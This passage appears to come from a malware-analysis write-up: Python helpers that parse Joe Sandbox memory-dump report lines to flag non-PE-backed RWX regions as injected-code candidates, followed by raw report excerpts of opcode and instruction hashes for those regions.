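def parse_sdmp(name: str, pe_backed: bool) -> DumpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    pid, dump, _ts, base, protect, _flags, mem_type, _extra = m.groups()
    return DumpRegion(int(pid, 16), int(dump, 16), int(base, 16),
                      int(protect, 16), int(mem_type, 16), pe_backed)


def parse_source_line(line: str) -> DumpRegion:
    """Parse a '• Source File: ..., Offset: ..., based on PE: ...' report line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"unrecognised source line: {line!r}")
    name, offset, pe = m.groups()
    region = parse_sdmp(name, pe == "true")
    if region.base != int(offset, 16):  # the Offset field must agree with the dump name
        raise ValueError(f"Offset {offset} disagrees with dump base {region.base:#x}")
    return region


def snapshot_matches(region: DumpRegion, snapshot_name: str) -> bool:
    """Cross-check the IDA-plugin snapshot name against the dump it claims to come from."""
    m = SNAP_RE.match(snapshot_name)
    if not m:
        return False
    pid, dump, base = m.groups()
    return (int(pid), int(dump), int(base, 16)) == (region.pid, region.dump, region.base)


def triage(report_text: str) -> dict[int, dict]:
    """Summarise each distinct dump region in a report excerpt, keyed by base address."""
    out: dict[int, dict] = {}
    region = None
    for line in report_text.splitlines():
        if "Source File:" in line:
            region = parse_source_line(line)
            out.setdefault(region.base, {"region": region, "functions": set(),
                                         "snapshot_ok": True,
                                         "candidate": region.is_injected_code_candidate()})
        elif region and (m := re.search(r"Snapshot File:\s*(\S+)", line)):
            out[region.base]["snapshot_ok"] &= snapshot_matches(region, m.group(1))
        elif region and (m := re.search(r"Opcode ID:\s*([0-9a-f]{64})", line)):
            out[region.base]["functions"].add(m.group(1))  # set() dedups repeated functions
    return out


# Constructed excerpt in the report's own layout; identifiers copied from this page.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
• Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
• Opcode ID: 9c56658f7ce49a5498b90be2cad418d0b0657d4ffa08a6db0c7b2706d8bcc831
Memory Dump Source
• Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
• Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
• Opcode ID: 74f8b02d70a0acb215d24abdcfc38ca0c3e463d6f0307d145693ac85424d0c06
Memory Dump Source
• Source File: 0000000E.00000002.3232679069.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
• Snapshot File: hcaresult_14_2_28dd000_VKkzqGUhsZwwm.jbxd
• Opcode ID: 777eee303b35a71fb34de68b1a1ba5d5741cd247127d2ceab543143cb5a3f0ac
"""

if __name__ == "__main__":
    for base, info in triage(SAMPLE_REPORT).items():
        r = info["region"]
        print(f"{base:#010x} {r.protect_name} {r.mem_type_name} pe_backed={r.pe_backed} "
              f"functions={len(info['functions'])} snapshot_ok={info['snapshot_ok']} "
              f"injected_code_candidate={info['candidate']}")
```

Run against the full report text instead of the constructed excerpt to see how many distinct functions Joe Sandbox lifted from each non-PE-backed RWX region; a region that is flagged as a candidate and carries many functions is the one to carve out of the dump and load into a disassembler first.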

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8d1336e27e6d8d2d86789e456e4208b410a3fa47e22ea411780d567095bc3c2
                                  • Instruction ID: 73b8c74b06d90a5c402652145a24c4a113afa35327309021e4f6cb02ec311b3a
                                  • Opcode Fuzzy Hash: a8d1336e27e6d8d2d86789e456e4208b410a3fa47e22ea411780d567095bc3c2
                                  • Instruction Fuzzy Hash: 26113C71A103559FDB65EFB885A03AD7BF5EF48210F24447AD80AE7201EB35C9428B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff54ed1780166acca6ecde0a27453f499baaa9e28662de68e938bd4562c12552
                                  • Instruction ID: bcd67217aef3a10e5a78fe4a5b73cd80ab1604445a961f1b4c0a916cf3d685cc
                                  • Opcode Fuzzy Hash: ff54ed1780166acca6ecde0a27453f499baaa9e28662de68e938bd4562c12552
                                  • Instruction Fuzzy Hash: 8A014071A003159FCB65EFB885A03AE7BF6EF48250F15047AD80AE7300EB35C8418BD5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b91ba0942d332a478aae2021f69e5257f4282a1228c1d5e4aa0c832c626dccd4
                                  • Instruction ID: a7284e066a320cc979c8a4d761d72efd18bf277085b5c5554bb303d7cacb3626
                                  • Opcode Fuzzy Hash: b91ba0942d332a478aae2021f69e5257f4282a1228c1d5e4aa0c832c626dccd4
                                  • Instruction Fuzzy Hash: 55018834A00149AFCF15FFB8F95199D7BB9EF41310F1046B8C4019B1A9EF356A4ADB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54f2a3307ffda589e6170f22077fe841a75a6733a0c01b1f4b7550ad04e328ce
                                  • Instruction ID: 20e455a0991f7af79bf366fa4d340656c91af7f17296c020b94d79b49f4f2aab
                                  • Opcode Fuzzy Hash: 54f2a3307ffda589e6170f22077fe841a75a6733a0c01b1f4b7550ad04e328ce
                                  • Instruction Fuzzy Hash: 13F02B73A04151EFD7229BE8D4F02AC7B71EE59211B1900D7C80ADB201DB25D442CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36812f565b55848914173711400c2dd93038be32aa9bd0f2361e9861d442de8b
                                  • Instruction ID: 833c3d8f980c0313f5b7dda3ef0a6304cdd723a45d67957d21ea9fac799e9bfb
                                  • Opcode Fuzzy Hash: 36812f565b55848914173711400c2dd93038be32aa9bd0f2361e9861d442de8b
                                  • Instruction Fuzzy Hash: 25F0C439B002088FC714DB64D6A9BAD77B2EF88715F1180A9E5069B3A4DF35AD02CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b797267c0226df85934feea9a65b543b6298279cd106824999f606b30ffd6d5f
                                  • Instruction ID: 15ab4de4f6cc183a4d33612362919902154f2e7d9f384f57eb6ee21134c1832b
                                  • Opcode Fuzzy Hash: b797267c0226df85934feea9a65b543b6298279cd106824999f606b30ffd6d5f
                                  • Instruction Fuzzy Hash: 86F0E138A40149EFCF05FFA8FA5199DBBB9EF80300F504678C40597269EB356E4A9B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%